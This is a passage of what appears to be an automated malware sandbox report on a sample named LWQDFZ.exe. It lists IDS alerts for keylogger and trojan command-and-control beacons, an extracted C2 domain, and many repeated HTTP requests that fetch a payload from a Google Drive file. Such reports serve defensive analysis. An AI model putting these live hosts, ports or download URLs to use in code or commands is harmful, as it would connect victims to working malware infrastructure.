                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user
                              Source: excel.exeMemory has grown: Private usage: 2MB later: 69MB

                              Networking

                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49714 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49714 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49858 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.9:49717 -> 69.42.215.252:80
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49810 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49763 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49961 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49961 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49900 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49963 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49969 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49973 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49973 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49970 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49974 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.9:49979 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49980 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49979 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49975 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49947 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49978 -> 172.111.138.100:5552
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49713 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49724 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49712 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49718 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49749 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49752 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49725 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49762 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49754 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49758 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49742 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49784 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49757 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49769 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49785 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49771 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49744 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49731 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49764 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49787 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49719 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49732 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49747 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49773 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49790 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.9:49772 -> 142.250.185.78:443
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_003F550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache | Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                              Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache | Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                              Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache | Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
